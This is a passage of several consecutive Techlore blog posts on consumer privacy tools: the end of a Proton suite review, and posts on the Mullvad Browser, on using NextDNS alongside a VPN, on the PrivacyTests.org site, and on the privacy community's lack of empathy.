people can realistically download/upload. The sad thing is even if Proton releases native clients, this doesn’t 100% solve the problem…what happens if you upload a file via your native application and send it to a family member who has to download via the web? In my view, Proton has to cater to the lowest denominator, or stop advertising no max file sizes. [Their website says](https://proton.me/drive/file-sharing) “Proton Drive has no size limit on shared files. If you can upload it, you can share it.” This is highly misleading. Another area says “Your recipients can download your file, regardless of its size or format, using the secure link.” - if you cannot guarantee it, stop advertising it! - Proton doesn’t integrate Drive with the ecosystem. Why when I send an email, and click attach file, can I not directly attach a Proton Drive file? And why is there no way to just email a file to a contact directly in Proton Drive? It feels like they rushed out Drive, without making it a fully-featured product to the user. [Proton has hinted](https://proton.me/blog/proton-mail-calendar-roadmap) they plan on making this better, but I have to ask why they publicly released it when it still feels like a beta service. If your needs are to just upload a few documents and share them with some contacts, great - this is all you need. But don’t mistake Proton Drive as competitive to Google Drive. (at least in its current state!) ## Proton Calendar 📆 ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716492279-0.jpg) Proton Calendar’s next, and similar to Mail I think it’s solid. And unlike Drive, Calendar is somewhat integrated into Proton’s ecosystem, where if someone emails you an invite, you can directly add it to your calendar - bravo. My general complaint with the calendar is speed, it can feel slow - though I try to be understanding that this is all zero knowledge and much more complicated to run at fast speeds than what Google’s doing. The applications are nice, though can feel limited and a bit clunky to use. There’s even internal collaboration via shared calendars with other Proton users! So not bad - I have the fewest complaints with the calendar, it mostly just works, at least for my needs. However, like the rest of Proton’s ecosystem, there are some feature parity issues that will be outlined later. ## Privacy & Security 🕵️ ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716492354-0.png) To set the scene for privacy & security: what Proton is trying to do is difficult. Email, Calendar, and Contacts are legacy technologies that were never designed to have modern protections. But despite these limitations, Proton has found ways to close the gap: - First, Proton physically cannot read your emails - they’re stored with zero knowledge encryption. This is even court-proven in the infamous case where [Proton handed over an IP address](https://techcrunch.com/2021/09/06/protonmail-logged-ip-address-of-french-activist-after-order-by-swiss-authorities/) \- which they stated in a [2014 blog post](https://proton.me/blog/protonmail-threat-model) they could be forced to do. It fascinates me that the privacy community interpreted this as a negative, as Proton proved in an incident they couldn’t hand over anything outside an IP. People who got mad over this had unrealistic expectations for what Proton, or what any private email could give them. - If you email someone else that uses Proton, you’ll have E2EE - end of story. If the other user doesn’t use Proton, you have two options: - The first is Proton’s password feature, where you send someone a password protected email, then use a secure communication method to send the password. I use this all the time as it’s very user friendly. - The second option is PGP, which Proton supports beautifully. The problem with PGP is the other person also needs to use it. But it’s awesome Proton directly offers this in their ecosystem. **So to address concerns that Proton is only E2EE for other Proton users, that’s not true. There are three options to use Proton Mail with E2EE, two of which don’t require the other user to use Proton.** - Third, Proton overall offers a private signup process. They even have a Tor site you can use to register, offering a whole new level of privacy when registering. - Fourth, aside from Proton knowing little about you, and giving you tools to communicate securely, there are some nice-to-haves: - They safely proxy images in your emails - They block trackers in your emails - They offer U2F (though I do wish this was supported in mobile) - And they now own SimpleLogin, meaning you gain instant access to a phenomenal aliasing tool to protect your email. - And finally, Proton is open source, which is a huge selling point from a transparency perspective. So, no Proton is not perfect - but they do a great job at offering better protection than almost all email providers, and they’re not given enough credit for that. People have unrealistic expectations for what an email provider can give them, and Proton has surpassed mine. If you’re looking for a more private & secure email experience, they have it - if you need more protection, then you shouldn’t be using email in the first place. ## Feature Parity 🙈 Now while privacy & security is Proton’s strength, let’s talk about their weakness: feature parity. What is feature parity? It’s releasing features consistently across clients so users get a similar experience on every device. I wanted to share some timelines of what Proton has done: ### UI - Proton released a new, much improved interface in June 2021 for the web client - But this didn’t hit their Android app until around January 2022 - Then their iOS app kept the old interface until April 2022 - Meaning it took Proton 10 months to roll out a new UI across their ecosystem. ### Proton Calendar - Proton Calendar was released for web to the public in June 2021 - Then the Android app was released to the public in April, 2022 - Then the iOS app was released in November, pretty much December 2022 - Meaning it took Proton about 18 months to roll out their calendar to all users. 18 months! ### Proton Drive - Proton Drive left beta for web in September 2022 - Proton Drive for mobile, both iOS and Android was surprisingly released in the same month, in December 2022 - This might seem like their best rollout so far - only taking 3 months to roll out to all devices. But as we covered, there are still no desktop clients, so this is still rolling out as we speak. (8 months in!) And these aren’t isolated incidents - this is part of their culture. [Their CEO stated this directly to me](https://www.reddit.com/r/ProtonMail/comments/u8p9s8/comment/i5mqib6/?context=3) in an AMA. And to speak to this: - A month ago Proton released a [new customizable toolbar](https://www.reddit.com/r/ProtonMail/comments/11wi590/introducing%5Fthe%5Fnew%5Fcustomizable%5Ftoolbar%5Ffor/) on iOS, with no Android support - meaning this is now an exclusive feature for iOS users. - A month before that, Proton released [scheduled email sending](https://www.reddit.com/r/ProtonMail/comments/11e804x/schedule%5Fsend%5Fis%5Fnow%5Favailable%5Fon%5Fthe%5Fprotonmail/) for the web and iOS, once again excluding Android. - Proton even did the same thing with their new [enhanced tracking protection](https://proton.me/support/email-tracker-protection), (a privacy feature!) only releasing it for web and iOS, excluding Android - meaning in some ways you’re actually less safe on the Android app. And even when things seem consistent, they never really are. Proton Calendar seems similar, but Android has a widget and iOS doesn’t - that’s a core feature just entirely missing from one of two mobile clients. Similarly, Proton Mail on Android has quick actions to deal with emails without needing to open the app - but on iOS that’s missing. Recently, Proton did a poll asking their community if they wanted new document, or photo features, and a [top comment is neither](https://www.reddit.com/r/ProtonDrive/comments/120pkqw/would%5Fyou%5Fprefer%5Fmore%5Fdocument%5Fsupport%5For%5Fphotos/), just release desktop clients for Proton Drive. People are tired of the inconsistency, especially when Proton advertises this ‘privacy ecosystem’, that’s not a coherent, central experience, but rather 4 services doing their own thing. After scripting this, Proton just released Proton Pass, a password manager, in beta, with a missing client - why are they releasing new services when their current services aren’t up to industry standards? In my eyes there’s no excuse given they have over 400 employees - yes, 400\. I think more people need to talk about this - because I know that people coming from the Google suite will notice these problems. If Proton figures this problem out, I think it’ll really elevate their service and make them an even better sell to Google users. ## Conclusion 🎁 I want to like everything about Proton, and there’s a lot I like, but it’s far from perfect. I think Proton Mail and Proton Calendar are their most robust offerings, Proton VPN is fine, but feels neglected, and Proton Drive feels like it should’ve never been released in its current state. Regarding their integration, and the general approach Proton has taken to development - I would expect better from one of the largest companies in the privacy space. Now what Proton knocks out of left field is privacy & security. They’re not perfect, but they almost universally offer some of the most well-built programs in each respective service in the industry… - Proton Mail crushes most of the competition from a safety & usability perspective… - as does the VPN… - and calendar… - and we’ll…ignore Drive. Individually, these services do very well, but I’d love to see some better integration across their clients, and especially between each respective service. I think it’d elevate the Proton offering and take them to a whole new level! If you’re looking to switch to the Proton suite and you enjoyed this review, we have an optional affiliate link you can use to purchase Proton, and it will also help support what we do here at Techlore, we greatly appreciate everyone who goes through the kickback link: [**★ Proton Kickback Link**](https://go.getproton.me/SH12O) [**★ Proton Standard Link**](https://proton.me/) ### Mullvad Released a Browser, and It Rocks! URL: https://techlore.tech/mullvad-released-a-browser-and-it-rocks/ Last updated: 2025-11-25T04:33:31.000Z Mullvad VPN shocked the community by releasing a new privacy browser: Mullvad Browser! Now, before we dismiss this as just another privacy browser - this actually IS different, so let’s take a look at what it is, who it’s for, and other important information so you can assess if this fits into your privacy workflow. --- ## Setting the Scene First, this is a [collaboration project](https://blog.torproject.org/releasing-mullvad-browser/) between the official Tor Project, and Mullvad VPN. At first glance, it appears to be a blend between a hardened Firefox & Tor Browser, as you’ll find: - A security ‘Safe, Safer, Safest’ level similar to Tor Browser - Identity reset option similar to Tor Browser - A Mullvad extension (More on this later) - The uBlock Origin extension - which many will recognize as a staple extension for hardening Firefox & blocking ads - Many already-adjusted settings & about:config adjustments, the extent of which you can find [here](https://mullvad.net/en/browser/hard-facts) The browser is free to download and does not require an active Mullvad subscription to use, though they heavily encourage using Mullvad VPN from a privacy & security perspective. We’ll chat more about this soon. --- ## General Usability Mullvad Browser does not utilize the Tor network, so speeds are overall good - even using it as-recommend with Mullvad VPN. As previously stated, this is extremely similar to the Tor Browser, you have: - NoScript - The Tor Browser safety toggles - No cookies or other data saved on browser exit - BUT you have some of the hardening from Firefox, and the addition of uBlock Origin to help block ads which is incredibly nice for a browser where you don’t want ads (all of them!?) The core downside to Mullvad Browser from a usability perspective is it utilizes private mode by default, so it’s unlikely to be your go-to browser for logging in to accounts between sessions. By all means, you definitely can, but you’ll need to log in to every account after your browser exists. And just to speak to this, webauthn is disabled by default (FIDO/Yubikey Support) unless you adjust some about:config items. (which breaks the purpose of the browser, as you don’t want to make any adjustments) Lastly, this is currently desktop-only, which I am in support of given the various limitations on mobile devices, particularly on iOS where everything is still required to use WebKit, though Android has some limitations that would make this difficult as well. --- ## Mullvad’s Search Engine: Leta On a quick note, there’s an option to use Mullvad’s new search engine: Leta. Leta is similar to Startpage, in that it provides Google results, but privately proxied. I have not had the chance to test it, but those with active Mullvad VPN subscriptions can easily test it and set it as your default search inside Mullvad Browser. (Yes, it requires an active Mullvad VPN subscription to use) --- ## Technical Information - Right off the bat, this is a Firefox-based browser (Before we get the annoying ‘but Crapium’ comments) - Mullvad has attempted to bridge the gaps between a standard browser (Firefox/Brave/etc.), a hardened browser (Hardened Firefox), and Tor Browser - in my eyes, the goal of Mullvad Browser is: - To offer strong privacy & security for the user - Offer strong fingerprinting resistance to prevent users from ‘standing out’ online - Be a bit less extreme than the Tor Browser from a usability/speed perspective - Push users to use at minimum a [trusted VPN](https://techlore.tech/vpn) to protect their web traffic through a service that’s better than nothing. (but less ideal than Tor) - Offer private browsing by default, making this a more disposable browser - which for many people may not be their go-to browser for logging in to personal accounts. - Offer this in a convenient package for anyone, without requiring user configuration or manual updates. You can use Mullvad Browser without a VPN and reap the benefits of its tracking, security, privacy, and fingerprinting protection. The ideal situation though, (and what Mullvad wants you to do) is to use Mullvad VPN, since then you’ll have the overall protection of the Tor Browser, while going through the same VPN servers as other Mullvad users, on paper achieving a similar result to Tor Browser + Tor Network. Where Mullvad VPN still greatly falls behind Tor is in the fact that the Tor network is decentralized, versus Mullvad is centralized. Though for the record, I believe Mullvad is one of two companies in the VPN realm (Mullvad & IVPN) that have the technology and reputation to pull something off like this and reassure people that it will be generally safe, despite its centralization. On the topic of VPN usage, I personally believe the most important thing is to be using *any* [trusted VPN.](https://techlore.tech/vpn) While using Mullvad’s VPN is the ideal option to reap the utmost anonymity benefits, I don’t see a huge sacrifice in using something like IVPN alongside this browser aside from the Mullvad extension telling me I’m not protected by Mullvad VPN. (incredibly annoying) Personally, if the difference between being safe is the minor anonymity differences between using Mullvad VPN & IVPN alongside this browser, then you should be using the Tor Browser. My TLDR list of configurations sorted from least to most safe: 1. Mullvad Browser w/ NO VPN 2. Mullvad Browser w/ Trusted VPN (ex. IVPN) 3. Mullvad Browser w/ Mullvad VPN 4. Tor Browser --- ## Personal Analysis I think Mullvad browser is a great service, it provides a strong, disposable browser, in an ultra convenient package for the average end-user. For most people, it’s almost a perfect drop-in for a hardened Firefox. If you combine Mullvad Browser with Mullvad VPN, then you’re even better off - and for many threat models, with Mullvad VPN, this could take the place of Tor Browser assuming you don’t need the maximum benefits of the Tor Browser. One fun thing is I recall in the past, several years ago, posing the question of what it would look like to use Tor Browser without actually going through the Tor network, and maybe just using a VPN for a lower threat model, and for that to actually be a mainstream product now is super exciting to me! Additionally, I’m happy that Mullvad is making this an open product. Mullvad could very easily require you to log in to your Mullvad account on setup and paywall this behind a subscription, but they chose not to. Rather, they are paywalling their Leta search engine and hoping that people see enough incentive to using Mullvad VPN with this browser. [For those curious, PrivacyTests has already listed Mullvad Browser if you want to see how it performs against other browsers.](https://privacytests.org/) --- ## The Hidden Selling Point over LibreWolf, Arkenfox, &*insert Firefox Fork* Something I didn’t touch on in our video of Mullvad’s new browser is how it stacks against other options. We may do some deeper dives into the technical differences between LibreWolf, Arkenfox, etc. but one thing I wanted to stress now: Those who follow us know I’m a fan of long-term sustainability for projects, meaning projects that: - Have a public team - Are pushing fast & consistent updates - Are constantly improving and growing their product - Will be around in 5+ years LibreWolf has fallen behind on security updates significantly in the past, and Arkenfox has a small number of maintainers, and require lots of DIY on the individual’s accord. (Both of these projects do awesome work, but in my eyes these are genuine limitations) Mullvad Browser is a ‘download & forget’ service, with automatic updates, that requires 0 user configuration on any desktop OS. It’s also being maintained by a company with a solid business model that will surely be around for years to come. The cherry on top is this is a formal collaboration with THE Tor Project, so you’re getting privacy & security oversight from some of the most trusted people in the space. Even if Mullvad Browser falls behind your favorite browser today, I’m willing to bet those days are numbered. (This isn’t to dismiss any valid positives other browsers bring to the table from a technical perspective, but I’m a huge fan of having a hardened Firefox option that’s truly recommendable to people around me without 10 asterisks around its usage. [Just to speak to this, visit our resources to see the variety of browsers we still recommend for different use-cases.)](https://techlore.tech/resources) --- ## Questions I Still Have - Is there a reason web authentication is disabled? Because that’s a pretty big usability sacrifice for people - If I uninstall the Mullvad extension because I’m not a Mullvad customer and have no intention of using Mullvad, is this a net loss to my anonymity with this browser? - And lastly, is there a future to expand this ecosystem? Will there be a way to sync bookmarks natively between devices? Or how about mobile clients? Personally I’m very happy with the current offering, but I know some people may want a bit more. Update: Our team-member Jonah Aragon loves to remain silent on important discussions and ended up answering these questions, attaching his answers below: 1. Tor Project hasn’t audited Google’s WebAuthn library that Firefox uses yet, there is an open issue in the Tor Browser tracker which would also be applicable here. 2. There is no impact to removing the Mullvad Browser extension, I’ve already confirmed this with them a few days ago. 3. The long-term plan is for usability to be improved over Tor Browser in a number of aspects. Private Browsing mode being mandatory wasn’t the end-goal, it’s a requirement for Tor Browser’s threat model (they want to avoid writing anything to disk) which isn’t applicable to Mullvad Browser, but Private Browsing mode currently provides a lot of other privacy improvements (service worker isolation for example). Mullvad Browser needs to figure out how to take those privacy improvements and bring them over to non-Private Browsing mode, which will take time. **★ This is a companion post to our** [**video on this topic.**](https://youtu.be/tsrt1elZ9FE) ### Using a Custom DNS (NextDNS) Alongside Your VPN URL: https://techlore.tech/using-a-custom-dns-nextdns-alongside-your-vpn/ Last updated: 2025-11-25T04:37:29.000Z The last couple videos on Techlore have experimented with using a custom DNS provider, specifically NextDNS, alongside various VPN providers. I’ll be summarizing the core takeaways for this blog. First, let’s set the stage. We [recently covered](https://youtu.be/u-uj%5FdLXu5s) VPNs and what they do and don’t do, and what it boils down to is they: - Transfer trust away from your internet service provider(s) to a (hopefully) more trusted party - Give you a small layer of privacy by hiding your IP address across websites That’s about it. They’re nice tools, but are not something that will instantly make you super private or secure. With that said, I personally can’t imagine not using a VPN, given there’s no other easy & convenient way to deal with my ISPs snooping on my web traffic. (Tor is generally inconvenient to run system-wide, day-to-day) ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716491165-0.png) Second, there are DNS blocklists. Every device you own connects to a DNS, which is likely your ISPs. (unless you actively changed it) Most VPNs have their own DNS they automatically use when you connect to the VPN server, which is generally what you want to use, as your VPN is (hopefully) one you trust that will safely handle your DNS requests. Some providers are beginning to roll out DNS blocklists, which actively block ad/malware/tracking and other domains through DNS. You can enable this on any of the main 4 VPNs we recommend, which all have their own version of this feature. (Windscribe, ProtonVPN, Mullvad, & IVPN) But, I don’t love this. These default blocklists are set in stone with little to no configuration options (maybe with the exception of ROBERT on Windscribe, which is still fairly limited) - so I went on a hunt for a better situation which gives me more power & control. ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716491206-0.jpg) Where it led was NextDNS. There are a multitude of security features that come along with using it, and the privacy perks are even cooler - enabling you to have a personalized layer of protection on all devices. Just a small number of features to outline are you can block native telemetry domains contacted by Windows/MacOS, set custom blocklists that can block anything (mobile ads, NSA servers, Google, etc.), a series of ‘parental’ controls (not sure why all features designed for boundaries around device usage are classified as ‘parental controls’ but okay), and that’s just the tip of the iceberg, there are endless possibilities with this tool! ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716491227-0.png) ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716491239-0.png) However, using NextDNS alongside my VPN on all operating systems proved to be problematic - particularly because documentation was so poor across VPN providers, so I went on a hunt to see what services are best at natively supporting this feature across their clients, without needing to use NextDNS IPV4 address linking, which isn’t ideal for most people’s use of VPNs. To put it simply, I was looking for VPN providers that natively supported custom IPV6 DNS addresses, or ideally DoH/DoT across a majority (or all) of their clients. Where did it lead? Put simply: Mullvad & IVPN ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716491270-0.png) With Mullvad, you can input your NextDNS IPV6 address as your custom DNS address, then enable the following IPV6 option to use NextDNS alongside Mullvad natively inside their clients. On Android, you can lean on Android’s native Private DNS feature to use DoT alongside Mullvad. (Or use IPV6 inside the Mullvad client, though I’d recommend DoT via Android’s native system setting) ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716491383-0.webp) With IVPN, you can input your DoH/DoT NextDNS URL natively into their clients, with the exception of Android where you have to rely on Android’s Private DNS offering to use DoT. To outline, I would comfortably say that IVPN beats out Mullvad in this realm, since for most people - DoH/DoT support is stronger than IPV6 from a privacy & security angle. Some users have expressed that there are ways to add custom DoH addresses within Windows & Linux alongside the VPN, but I have not tested this myself, nor is there any VPN that documents this to be possible. --- ### Okay Henry this is super techy, what does this all mean? What this means is that through IVPN (preferred because of DoH/DoT) or Mullvad - you can natively combine the perks of using a VPN with the perks of using a tool like NextDNS. All it takes is pasting your NextDNS DoH/DoT/IPV6 address into each respective VPN client. Through this configuration: You are protecting your IP address and transferring trust from your ISP to one of the most private, open source VPN providers on the market (IVPN & Mullvad) - neither of which even require an email to register for. Additionally, you are gaining access to the incredible protection of NextDNS, which means that all websites, apps & devices are all being funneled through a firewall that is actively blocking anything you want it to, with an endless amount of customization for the most noob, or most advanced users. ### Should I do this? Totally your call. If you’re happy with the blocklists provided by your VPN provider (if any) - then sure, just stick with your native VPN provider’s DNS. Personally, I wanted something more thorough that gave me better control over my web traffic that no VPNs were natively providing. ### Drawbacks? A few things: - You are opening yourself up to another party to trust. While NextDNS has a solid reputation, you are now having to trust both your VPN and DNS provider independently with your web traffic. I don’t find this to be a massive risk, but definitely ensure NextDNS fits your safety requirements before choosing to use them. - Sites can theoretically try to “de-anonymize” VPN users by recognizing users have a custom DNS configuration despite sharing the same IP address with other users of the same VPN. My response to this is: There are a MILLION other ways to ‘de-anonymize’ VPN users, almost all of which work independently of whichever DNS you choose to use - even the VPN’s native DNS. If fingerprinting is a concern of yours, Tor and other more robust tools are what you should be using. This doesn’t seem like a real concern for the average VPN user, but is still a question you should personally reflect on for yourself. - NextDNS is free up to 300k requests per month. I don’t hit the max so I am using it for free, but perhaps you may need to pay for it. If that’s the case, then there’s the natural drawback of needing to spend $. --- ## A Word on VPN Documentation This journey was ridiculous. I put out my first video that over-relied on things I read online, much of which ended up not being completely accurate. For example, Mullvad directly says on their website they do not support custom DNS on iOS: ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716491485-0.png) Guess what? They do support custom DNS on iOS. So the first-party website is incorrect. Let me summarize the extent of each provider’s documentation: - Windscribe has a [post](https://windscribe.com/knowledge-base/articles/how-to-use-custom-dns-in-the-windscribe-app) on DNS, which only refers to desktop clients, and doesn’t specify what options are given for Custom DNS. (IPV4/IPV6/DoH/DoT) So there is no easy way for a user to know if they can use a custom DNS provider alongside Windscribe when shopping for a VPN. - ProtonVPN simply has no documentation anywhere (that I could find) on custom DNS, despite it being a feature they support natively on two of their clients via IPV4\. (Windows & Linux) So there is no easy way for a user to know if they can use a custom DNS provider alongside ProtonVPN when shopping for a VPN. - Mullvad has a [blog post](https://mullvad.net/en/blog/2021/4/15/support-custom-dns-servers-launched/) covering the release of Custom DNS - which is outdated (still says there is no iOS support, which it likely didn’t have at the time), but nowhere does it directly specify what options for custom DNS are given across its clients. All that is stated is: “Encrypted DNS is something entirely different and isn’t supported in the app.” - so it’s safe for us to count out DoH/DoT natively inside Mullvad. But what about Android, where this is easily supported alongside Mullvad? Nowhere does it list that they support IPV6 addresses. And if you trust the Mullvad website, you may be under the impression that custom DNS is still not supported on iOS - which is not true! So there is no easy way for a user to know if they can use a custom DNS provider alongside Mullvad when shopping for a VPN. - IVPN has the best documentation of these four providers, with a dedicated [support article](https://www.ivpn.net/knowledgebase/general/custom-dns/) on the topic. But again, it (was!) lacking. Previously, it was unclear what methods of custom DNS were supported across their clients - making it challenging to know what clients you can easily use NextDNS alongside IVPN. After releasing our videos, it seems they have updated their documentation to properly outline this information - so yay! 🎉 ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716491531-0.webp) Take notes VPN providers: What IVPN has done is exactly how this feature should be documented, clearly outlining what is/isn’t supported on each client - down to the method of custom DNS supported. ## Want to watch the videos? [**★ The First Video**](https://youtu.be/xIXG3cFT6O4) (Several mistakes are made in this video that are corrected in the second video) [**★ The Second Video**](https://youtu.be/py9RtY2fYaA) Some corrections in the second video: - IVPN updated their documentation to be clearer! https://www.ivpn.net/knowledgebase/general/custom-dns/ - Android is actually using DoT, NOT DoH. Though for the purposes of this video this shouldn't impact the takeaways or general concepts. - NextDNS has an open source CLI tool, though their native clients don't appear to be open source. With that said, we're not trying to use the native clients & I'm not concerned with the server being open source since there's no way for us to verify they're running that code anyway. But definitely a correction for people who desire more of these things. - Linux & Windows have native DoH options that *may* work with some of these VPNs. (Didn't test this myself) Thank you to people who are sharing more information regarding this situation. I'm learning more from comments on YouTube than from service's themself, which is really my core complaint here. ### See If Your Browser Is Private with This Tool: PrivacyTests.Org URL: https://techlore.tech/see-if-your-browser-is-private-with-this-tool-privacytests-org/ Last updated: 2025-11-25T04:45:29.000Z With every browser claiming to be the most private and secure, it’s challenging to separate the facts from the BS. To assist with this, let’s go through an open source tool that clearly outlines privacy and security features of each browser - [privacytests.org](https://privacytests.org/) When you visit privacytests.org, you’re given several browser options, with basic pass & fail marks for each test. ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716487257-0.png) You can click around to see information about each test and even the raw data result of every test. ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716487285-0.png) There are desktop browsers & mobile browsers, as well as private mode tests & nightly tests for non-public releases to give you a plethora of options to go through on all devices. Definitely click around and explore the site to see what it’s all about! ## It’s Just Data ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716487327-0.png) Now this is data, and imperfect data nonetheless. For example, ‘Tor-enabled’ only checks if Tor is used by default, so Brave fails, despite Brave having a [non-default Tor mode](https://support.brave.com/hc/en-us/articles/360018121491-What-is-a-Private-Window-with-Tor-Connectivity-), but there’s no ‘non-default Tor mode’ test to demo this. Likewise, (before I’m accused of shilling Brave) there’s a project for Firefox called [Arkenfox](https://github.com/arkenfox) with countless privacy & security improvements, none of which are factored in the Firefox section that would surely improve its performance. This is not a fault of the site itself, but it demonstrates a limited scope of the tool. With that said, you can [run these tests yourself](https://github.com/arthuredelstein/privacytests.org) on whatever configuration you want! And there’s a [third-party site](https://www.first-party.site/privacy-protections/) that attempts to make it a bit simpler as well. ## How To Use This Tool With a combination of these tools, you can test countless browser configurations and directly compare browsers to see how they stack up, which has never been possible before! ### Regarding your browser choices and what you should use: The beautiful thing this tool demonstrates is almost every browser wins at something, and loses at something else. I encourage you to be open-minded with your browser choice, and even use multiple browsers if necessary - there’s no rules against that! With that said, as of today, Brave, Librewolf, and Tor really bring it home in a majority of tests for desktop, and Mull & Bromite kick butt on mobile, alongside Brave & Tor on all platforms, BUT that doesn’t make them the best choice for everyone… This is just data. Like all data, you should combine it with other priorities to make a decision. Brave might overwhelmingly win in one section, but Librewolf doesn’t support the Chromium monopoly. Brave syncs bookmarks without a central account, but maybe Edge integrates with a Microsoft feature you can’t live without. Your needs are valid and should be taken into account, so you can pick the browser (or browsers) that best fit your needs. **★ This is a companion post to our** [**video on this topic.**](https://youtu.be/y9UJEn81UVw) ### The Real Privacy Enemy is Ourselves URL: https://techlore.tech/the-real-privacy-enemy-is-ourselves/ Last updated: 2025-11-25T04:49:29.000Z For those who don’t know me, my name is Henry and I’m the CEO of Techlore — a team with the goal of spreading privacy to the masses through various resources and video content. I also am a co-host for the podcast Surveillance Report — where people can keep up with the convoluted news in the privacy world. I’ve been deeply involved in the privacy community for years now, and well…**I feel done.** The alluring human right of privacy is trampled daily through a losing battle we’ve come to accept as just life. We are up against some of the most powerful entities to ever exist — the Facebooks, Googles and Amazons of the world who want nothing more than to harvest every piece of data to fuel the surveillance capitalism of the 21st century. In addition, their hands are deep in politician’s wallets to control one of the few avenues we can use to reclaim the smallest glimmer of freedom. Nevertheless, as hopeless as this war can be, it isn’t those in power that discourage me — it’s the privacy community itself. I’m incredibly discouraged at the privacy community’s inability to come together for a losing fight. There is nothing more those in power want to see than our inability to cooperate, instead opting to bicker for hours about a user’s browser choice…why someone’s messenger isn’t good enough…why Tor isn’t good enough…why someone shouldn’t use a VPN when Tor exists — even if all these tools properly fit the individual’s threat model. Ultimately, the issues seem to boil down to two causes: **A) An utter lack of empathy,** and **B) The distaste for evidence-based, personalized information.** ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716426196-0.webp) ## Empathy - Empathy is understanding we once used to have Facebook accounts. - Empathy is understanding different people have different threat models. - Empathy is experiencing the emotions someone experiences when they first learn about the privacy-invasive world we live in. - Empathy is active understanding when someone suffers a data breach, avoiding the temptation to shame the impacted user for not having better OPSEC. The sheer lack of empathy in the privacy community is astounding, I’ve never seen anything quite like it. Developers attacking other projects to protect their fragile ego, people new to privacy being shamed for not knowing everything out the gate, users pushed to feel regret because of their conscious (and commonly educated) decision to stay within the Apple ecosystem and work within its limitations. The list goes on. Expressing empathy can be a difficult skill. But in the privacy community, the lack of empathy spreads like wildfire — meaning it is vital we prioritize it. Every time we fail to express empathy, we introduce a new brick in the wall excluding ourselves from the outside world. Consequently, this directly prevents our ability to spread our message to others — sealing our fate. ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716426405-0.jpg) ## The Individual Threat Model The second issue I’ve observed in the privacy community is the utter lack of evidence-based, personalized information. Many people are more attracted to the idea of a service being a honeypot than being safe, even if all signs point to the latter. This overall makes a great deal of sense: we feel victimized, we feel the world is working against us, we feel anything is possible, we need to stay on our toes. However, the reality is we need to bury our heads in evidence-based approaches to improving privacy or security, or else we let a person online selling dangerous products convince people that ProtonMail is a honeypot, and that their own platform with falsely advertised E2EE, no community oversight, and readily available exploits is the ‘true’ solution. ProtonMail is open source, community-vetted, approved by some of the most trustworthy individuals in the privacy space, and has proven time-and-time again through court cases they only comply as they originally promised they would. To put it simply: ProtonMail is one of the best services attempting to address email’s inherently broken issues. But what happens? One court case comes out, and ProtonMail is now a honeypot, despite them complying with the case exactly how they promised they would in blog posts dating back to [2014](https://proton.me/blog/protonmail-threat-model) — they handed over an individual’s IP address. What’s fascinating is many of the individuals proclaiming ProtonMail to be a honeypot due to this incident flocked to Tutanota, an email provider who dealt with an eerily similar case in Germany a few years ago. In fact, almost every email provider deals with these cases — they are required to by law. The true error lies in the users who misunderstand what a “private” email provider offers them, thinking the solution is all-or-nothing privacy. Rather than adjusting their expectations accordingly, confirmation bias forces the user into believing the service must be compromised — successfully avoiding all layers of nuance. I’ve unironically heard from these individuals that we may as well be using Gmail since ProtonMail handed over an IP address in an international investigation — despite ProtonMail still protecting the contents of all of their emails, still offering an open source experience to users, still protecting all other aspects of their user’s privacy, still offering simplified PGP support, still offering end-to-end encryption for external contacts who don’t use ProtonMail, still offering end-to-end encrypted contacts, still offering private sign-up options, still offering a Onion website, and many more things Gmail could never offer them. ProtonMail is a common example, but this problem plagues countless services in the community, to name a few: - Signal is compromised because of a phone number requirement, despite all points of evidence proving Signal is safe for a large number of threat models. - Brave is spyware because of two scandals unrelated to its privacy & security. - Firefox is spyware because of Pocket. - Tor is compromised because the government has gained access to a percentage of nodes. To paraphrase the mentality, *“Something isn’t perfect, therefore it shouldn’t be used”* — this is the nirvana fallacy at its best, or **“the informal fallacy of comparing actual things with unrealistic, idealized alternatives. It can also refer to the tendency to assume there is a perfect solution to a particular problem.”** The irony is if we apply the same fallacious mentality to the services these individuals actually believe are safe, you achieve the same result: - To the user who ditched Signal for Session because of the phone number requirement, let’s talk about Session’s lack of Perfect Forward Secrecy, which consequently makes it compromised. - To the user who ditched ProtonMail for Tutanota, let’s talk about Tutanota’s German court case, proving they were a honeypot. - To the user who ditched Brave & Firefox for an out-of-date Firefox fork, let’s talk about its delayed security updates and how it’s most certainly a honeypot. At the end of the day, every service has drawbacks. To add additional complexity, a service can have different advantages and disadvantages on a per-user basis, as an individual’s threat model dictates the services that work best for their needs. It’s completely valid to stop using an email provider if their compliance with an international investigation impacts your threat model, but it does not mean the service is a honeypot. We need to consider individual threat models and offer personalized advice to avoid planting unnecessary seeds of doubt in an already fragile community that struggles to be a single collective. ![Techlore Blog - Digital Rights for All 🔐](https://bear-images.sfo2.cdn.digitaloceanspaces.com/techlore-1716426694-0.jpg) ## My Declining Passion Pivoting to a more personal note, I want to discuss my experience within Techlore. We dedicate countless hours towards our content. My stomach sinks when we put out a video that we spent weeks digging for the best possible information, reading through countless research papers and articles, condensing this complex information into an approachable 8 minute video, only for a loud minority of users to leave comments filled with complete misinformation — fed nonsense from a self-proclaimed expert, a sensationalized video, and/or a misleading 